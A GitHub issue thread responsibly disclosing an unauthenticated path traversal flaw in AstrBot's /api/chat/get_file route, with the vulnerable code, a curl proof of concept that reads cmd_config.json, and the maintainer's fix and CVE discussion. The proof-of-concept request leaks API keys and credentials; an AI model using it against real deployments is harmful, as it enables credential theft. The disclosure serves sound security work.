[Security] Unauthorized Path Traversal Vulnerability in /api/chat/get_file of AstrBotDevs/AstrBot

[7resp4ss]

发生了什么

Unauthorized Path Traversal Vulnerability in /api/chat/get_file of AstrBotDevs/AstrBot

Summary

Attackers can exploit a Path traversal vulnerability by manipulating the filename parameter in the /api/chat/get_file function to read files on the target host. The vulnerability originates from line 58 in AstrBot/astrbot/dashboard/routes /chat.py, where the code filename = request.args.get("filename") does not sanitize the filename.

POC

Build

Follow these steps to set up the test environment:

pip install uv
git clone https://github.com/AstrBotDevs/AstrBot && cd AstrBot
uv run main.py

Reproduce

• run：curl -L http://0.0.0.0:6185/api/chat/get_file?filename=../../../data/cmd_config.json

This will read cmd_config.json to leak llm key、username and password(md5)!!!

Discussion

    async def get_file(self):
        filename = request.args.get("filename")
        if not filename:
            return Response().error("Missing key: filename").__dict__

        try:
            with open(os.path.join(self.imgs_dir, filename), "rb") as f:
                if filename.endswith(".wav"):
                    return QuartResponse(f.read(), mimetype="audio/wav")
                elif filename.split(".")[-1] in self.supported_imgs:
                    return QuartResponse(f.read(), mimetype="image/jpeg")
                else:
                    return QuartResponse(f.read())  # <------------- Here

        except FileNotFoundError:
            return Response().error("File not found").__dict__

Obviously, this route directly uses the passed file name as the target path to read the file. One of my suggestions for fixing this is to only access this route after the user is authenticated.

Impact

The potential harms of this vulnerability include:

• Information leak.

Credit

The vulnerability was discovered by 360 VRI.

如何复现？

Build

Follow these steps to set up the test environment:

pip install uv
git clone https://github.com/AstrBotDevs/AstrBot && cd AstrBot
uv run main.py

Reproduce

• run：curl -L http://0.0.0.0:6185/api/chat/get_file?filename=../../../data/cmd_config.json

This will read cmd_config.json to leak llm key、username and password(md5)!!!

AstrBot 版本、部署方式（如 Windows Docker Desktop 部署）、使用的提供商、使用的消息平台适配器

v3.5.12

操作系统

Linux

报错日志

[2025-05-29 17:40:03 +0800] [22412] [INFO] Running on http://0.0.0.0:6185 (CTRL + C to quit)
[2025-05-29 17:40:05 +0800] [22412] [INFO] 127.0.0.1:49500 GET /api/chat/get_file 1.1 200 2775 2270

你愿意提交 PR 吗？

• 是的，我愿意提交 PR!

Code of Conduct

• 我已阅读并同意遵守该项目的 行为准则。

[7resp4ss]

Hi @Soulter,

I have reported a Unauthorized Path Traversal Vulnerability in the project and provided steps to reproduce and a proof of concept. As this vulnerability may pose a serious security threat to project users, I suggest applying for a CVE number for this vulnerability to facilitate tracking and disclosure. I would like to ask if you can assist in submitting a CVE request or if there is a specific process that I need to cooperate with? If additional information or support is required, I am happy to provide it.

Thank you for your attention and support for project security!

Best wishes,
7resp4ss

[Soulter]

Hi 7resp4ss,

Thanks for reporting the vulnerability and sharing the details! I agree that applying for a CVE would be helpful.

I've already fixed this in PR #1676 and the PR has been reviewed by @Raven95676 and @anka-afk. We are happy to assist you in submitting CVE.

Thanks again for your help!

Best,
Soulter

[7resp4ss]

Hi @Soulter,

Thank you for your swift response and for addressing the vulnerability in PR #1676! I’m truly grateful for your willingness to assist with the CVE application. To help streamline the process, I’d like to share the standard steps for requesting a CVE, which is typically handled by developers or project maintainers to ensure proper vulnerability tracking and disclosure.

If your project is hosted on GitHub, here are the recommended steps to apply for a CVE:

1. Create a Security Advisory

• Log in to GitHub, navigate to your project repository, and go to Security > Advisories > New draft security advisory.
• Provide vulnerability details:
  • Title: A concise description, e.g., "Path Traversal Vulnerability in /api/chat/get_file".
  • Description: Include technical details, impact, and reproduction steps.
  • Affected Versions: List the affected version range (e.g., v1.0.0 to v1.2.3).
  • Severity: Use GitHub’s CVSS calculator to assess the vulnerability’s severity.
  • Fixed Version: Specify the fixed version (e.g., v1.2.4) or relevant commit.
• Save as a draft (visible only to maintainers).

2. Request a CVE ID

• In the Security Advisory interface, select the Request CVE ID option.
• Upon submission, GitHub will request a CVE ID from its CNA system, typically assigning one within a few days (e.g., CVE-2025-XXXX).

3. Publish the Advisory

• After releasing the fixed version, upgrade the draft advisory to Published to share vulnerability details and the CVE ID with the community.

Example：GHSA-8vvx-qvq9-5948

I’d be happy to assist further, such as drafting the vulnerability description or calculating the CVSS score. If you’re short on time to handle the CVE application, I’d be glad to take care of it on your behalf.

Thank you again for your commitment to project security and collaboration!

Best regards,
7resp4ss